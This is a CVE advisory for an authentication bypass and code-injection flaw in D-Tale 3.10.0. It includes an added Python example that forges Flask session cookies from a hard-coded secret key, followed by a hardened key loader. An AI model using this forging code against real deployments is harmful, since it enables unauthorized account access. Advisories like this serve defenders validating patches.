CVE-2024-3408
Published: 06 June 2024
Summary
CVE-2024-3408 is a critical-severity Use of Hard-coded Credentials (CWE-798) vulnerability in D-Tale (man-group/dtale). Its CVSS base score is 9.8 (Critical).
Operationally, exploitation aligns with the MITRE ATT&CK technique Exploit Public-Facing Application (T1190); ranked in the top 0.3% of CVEs by exploit likelihood; it is not currently listed in the CISA KEV catalog; a public proof-of-concept is referenced.
This vulnerability is AI-related: categorised as Data Processing Libraries, in the Other ATLAS/OWASP Terms risk domain.
Deeper analysis
man-group/dtale version 3.10.0 contains an authentication bypass and remote code execution vulnerability stemming from a hardcoded SECRET_KEY in its Flask configuration combined with insufficient input validation on custom filter queries. The flaw permits forged session cookies when authentication is enabled and allows arbitrary code execution via the /update-settings endpoint regardless of the enable_custom_filters setting. The issue is tracked under CWE-798 and CWE-94 with a CVSS 3.1 score of 9.8.
An unauthenticated remote attacker can exploit the hardcoded key to impersonate a valid session and then submit crafted filter payloads that bypass intended restrictions, resulting in arbitrary code execution on the server with full confidentiality, integrity, and availability impact.
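The following stand-alone Python is an added illustration, not dtale's or Flask's own code, of why a hard-coded Flask SECRET_KEY is by itself an authentication bypass. Using only the standard library it models the signing scheme Flask's default session cookie uses (itsdangerous URLSafeTimedSerializer: base64url JSON payload, timestamp, HMAC-SHA1 with a key derived from the secret and the salt cookie-session), mints a cookie for an arbitrary session dict with the known key, and shows the server-side verifier accepting it. The key literal, the session fields and the DTALE_SECRET_KEY environment variable are constructed for the example; byte-for-byte compatibility with a particular Flask release is not claimed and should be confirmed against the target before relying on it.

```python
"""Added example: forging a Flask-style session cookie from a hard-coded SECRET_KEY.

Stand-alone re-implementation (stdlib only) modelled on Flask's default session
signing (itsdangerous URLSafeTimedSerializer, salt b"cookie-session", "hmac" key
derivation, SHA-1 digests). Not dtale's or Flask's code; compatibility with a
given Flask release is an assumption to verify, not a claim.
"""
import base64
import hashlib
import hmac
import json
import os
import time
import zlib

SALT = b"cookie-session"  # Flask's default session salt
SEP = b"."
# Constructed stand-in for a key literal committed to source control.
HARDCODED_SECRET_KEY = b"hard-coded-dev-key"


def _b64(data):
    return base64.urlsafe_b64encode(data).rstrip(b"=")


def _unb64(data):
    return base64.urlsafe_b64decode(data + b"=" * (-len(data) % 4))


def _derive_key(secret_key):
    # itsdangerous "hmac" key derivation: HMAC(secret, salt)
    return hmac.new(secret_key, SALT, hashlib.sha1).digest()


def _signature(secret_key, value):
    return _b64(hmac.new(_derive_key(secret_key), value, hashlib.sha1).digest())


def forge_session_cookie(secret_key, session, timestamp=None):
    """Mint a cookie for any session dict. Whoever holds the key can do this."""
    payload = json.dumps(session, separators=(",", ":"), sort_keys=True).encode()
    compressed = zlib.compress(payload)
    if len(compressed) < len(payload) - 1:
        body = b"." + _b64(compressed)  # leading dot marks a zlib-compressed payload
    else:
        body = _b64(payload)
    ts = int(time.time()) if timestamp is None else timestamp
    ts_bytes = ts.to_bytes((ts.bit_length() + 7) // 8, "big")
    signed = body + SEP + _b64(ts_bytes)
    return (signed + SEP + _signature(secret_key, signed)).decode()


def verify_session_cookie(secret_key, cookie, max_age=31 * 24 * 3600, now=None):
    """Server side: return the session dict, or None on bad signature or expiry.
    max_age mirrors Flask's 31-day PERMANENT_SESSION_LIFETIME default."""
    raw = cookie.encode()
    try:
        signed, sig = raw.rsplit(SEP, 1)
        body, ts_b64 = signed.rsplit(SEP, 1)
    except ValueError:
        return None
    if not hmac.compare_digest(sig, _signature(secret_key, signed)):
        return None
    ts = int.from_bytes(_unb64(ts_b64), "big")
    current = int(time.time()) if now is None else now
    if current - ts > max_age:
        return None
    if body.startswith(b"."):
        payload = zlib.decompress(_unb64(body[1:]))
    else:
        payload = _unb64(body)
    return json.loads(payload)


def demo_forgery():
    """Attacker side: the committed key alone yields an 'authenticated' session."""
    forged = forge_session_cookie(
        HARDCODED_SECRET_KEY,
        {"authenticated": True, "username": "admin"},  # constructed session fields
        timestamp=1717632000,
    )
    accepted = verify_session_cookie(HARDCODED_SECRET_KEY, forged, now=1717632100)
    rotated = verify_session_cookie(b"per-deployment-random-key", forged, now=1717632100)
    return {
        "accepted_by_vulnerable_server": accepted is not None,
        "accepted_after_key_rotation": rotated is not None,
    }


def load_secret_key():
    """Hardened configuration: take the key from the environment (assumed variable
    name DTALE_SECRET_KEY) and refuse to start on a missing or shipped literal."""
    key = os.environ.get("DTALE_SECRET_KEY")
    if not key or key.encode() == HARDCODED_SECRET_KEY:
        raise RuntimeError("SECRET_KEY must be a per-deployment random value")
    return key.encode()
```

The mitigation is in the same block: load_secret_key refuses to run with the committed literal, and rotating the key once invalidates every cookie minted under the old one, which is why verify_session_cookie returns None for the forged cookie under a different key. Note that rotation alone does not close the code-execution path through /update-settings described above; that needs the input-validation fix in the referenced commit.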
The referenced commit 32bd6fb4a63de779ff1e51823a456865ea3cbd13 in the dtale repository addresses the input-validation and session-handling weaknesses, while the associated huntr.dev bounty report details the original discovery and reproduction steps for defenders validating patches.
The EPSS score remains elevated near 0.92 with negligible movement between current and peak values.
EU & UK References
- 🇪🇺 ENISA EUVD: EUVD-2024-0050
Vulnerability details
man-group/dtale version 3.10.0 is vulnerable to an authentication bypass and remote code execution (RCE) due to improper input validation. The vulnerability arises from a hardcoded `SECRET_KEY` in the flask configuration, allowing attackers to forge a session cookie if authentication is enabled. Additionally, the application fails to properly restrict custom filter queries, enabling attackers to execute arbitrary code on the server by bypassing the restriction on the `/update-settings` endpoint, even when `enable_custom_filters` is not enabled. This vulnerability allows attackers to bypass authentication mechanisms and execute remote code on the server.
- CWE(s): CWE-798 (Use of Hard-coded Credentials), CWE-94 (Improper Control of Generation of Code, 'Code Injection')
AI Security Analysis
- AI Category: Data Processing Libraries
- Risk Domain: Other ATLAS/OWASP Terms
- OWASP Top 10 for LLMs 2025: None mapped
- Classification Reason: D-Tale (dtale) is an interactive web-based data exploration and visualization tool built on Pandas, commonly used in data science and ML workflows for data processing, making it a data processing library in the AI/ML context. Flagged on an AI/ML bug bounty platform (Huntr).
Related Threats
MITRE ATT&CK Enterprise Techniques
- T1606.001 Forge Web Credentials: Web Cookies
- T1190 Exploit Public-Facing Application
Why these techniques?
The hardcoded SECRET_KEY lets an attacker forge session cookies and bypass authentication (T1606.001). Improper input validation on custom filter queries enables unauthenticated remote code execution via the /update-settings endpoint (T1190).
Affected Assets
Mitigating Controls
Likely Mitigating Controls
Per-CVE control mapping for this CVE has not run yet; the list below is derived from the weakness types (CWEs) cited in the NVD entry.
- Enables users to notice when hard-coded credentials have been exploited for unauthorized access.
- Security training explicitly warns against hard-coded credentials, lowering their use in systems.
- Policy and procedures prohibit hard-coded credentials in favor of managed authentication.
- External identity providers eliminate the need for hard-coded credentials in applications.
- Changing default authenticators prior to first use and protecting content prevents use of hard-coded credentials.
- Central credential stores and rotation policies remove the need for hard-coded credentials in configuration files or code.
- Intelligence programs surface reports of campaigns that abuse hard-coded credentials in products, prompting removal or replacement and thereby reducing successful exploitation.
- Planned investment enables secure credential storage and management systems instead of hard-coded credentials.